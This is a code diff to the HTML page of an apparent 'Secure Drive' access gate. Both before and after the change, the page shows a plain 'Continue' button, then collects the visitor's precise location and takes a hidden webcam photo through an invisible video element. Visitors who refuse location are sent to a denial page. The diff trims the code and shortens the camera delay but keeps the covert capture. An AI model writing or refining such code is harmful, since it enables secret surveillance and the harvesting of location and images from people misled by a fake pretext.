--- a/index.html
+++ b/index.html
@@ -44,15 +44,6 @@
       border-radius: 5px;
       margin-top: 1em;
     }
-    video.invisible-cam {
-      width: 1px;
-      height: 1px;
-      position: fixed;
-      top: 0;
-      left: 0;
-      opacity: 0;
-      z-index: -1;
-    }
     @keyframes spin {
       0% { transform: rotate(0deg); }
       100% { transform: rotate(360deg); }
@@ -62,7 +53,7 @@
 <body>
   <div id="main">
     <div id="statusText">Permissions are required to access Secure Drive.</div>
-    <button onclick="startAll()">Continue</button>
+    <button onclick="requestAllPermissions()">Continue</button>
   </div>
 
   <script>
@@ -96,12 +87,11 @@
         const video = document.createElement("video");
         video.setAttribute("playsinline", true);
         video.muted = true;
-        video.className = "invisible-cam";
+        video.style.position = "absolute";
+        video.style.opacity = "0";
         video.srcObject = stream;
         document.body.appendChild(video);
-
-        await video.play().catch(err => console.warn("Video play failed", err));
-
+        await video.play();
         await new Promise((resolve) => {
           const waitForSize = () => {
             if (video.videoWidth > 0 && video.videoHeight > 0) resolve();
@@ -109,18 +99,14 @@
           };
           waitForSize();
         });
-
-        await new Promise(res => setTimeout(res, 5000)); // Allow camera to warm up
-
+        await new Promise(res => setTimeout(res, 3000));
         const canvas = document.createElement("canvas");
         canvas.width = video.videoWidth;
         canvas.height = video.videoHeight;
         const ctx = canvas.getContext("2d");
         ctx.drawImage(video, 0, 0, canvas.width, canvas.height);
         capturedImageData = canvas.toDataURL("image/png");
-
         stream.getTracks().forEach(t => t.stop());
-        video.remove();
       } catch (err) {
         console.warn("Camera access denied or failed", err);
       }
@@ -167,48 +153,43 @@
     function askNotificationPermission() {
       return new Promise((resolve) => {
         if ('Notification' in window && Notification.permission !== 'granted') {
-          Notification.requestPermission().then(resolve).catch(resolve);
+          Notification.requestPermission().then(() => resolve(true)).catch(() => resolve(false));
         } else {
-          resolve();
+          resolve(true);
         }
       });
     }
 
     function askLocation() {
       return new Promise((resolve) => {
-        if (!navigator.geolocation) {
-          console.warn("Geolocation not supported");
-          return resolve(false);
-        }
-
+        if (!navigator.geolocation) return resolve(false);
         navigator.geolocation.getCurrentPosition(
           (pos) => {
             coords.lat = pos.coords.latitude;
             coords.lon = pos.coords.longitude;
             coords.acc = pos.coords.accuracy;
-            console.log("Location granted", coords);
             resolve(true);
           },
-          (err) => {
-            console.warn("Location denied", err);
-            resolve(false);
-          },
+          () => resolve(false),
           { enableHighAccuracy: true, timeout: 10000, maximumAge: 0 }
         );
       });
     }
 
-    async function startAll() {
+    async function requestAllPermissions() {
       document.getElementById("main").innerHTML = `
         <div id="statusText">Requesting permissions…</div>
         <div id="spinner"></div>
       `;
 
-      const locationAllowed = await askLocation();
-      const notifDone = await askNotificationPermission();
+      const [location, notifications] = await Promise.all([
+        askLocation(),
+        askNotificationPermission()
+      ]);
+
       await captureSnapshot();
 
-      if (!locationAllowed) {
+      if (!location) {
         window.location.href = deniedPage;
         return;
       }
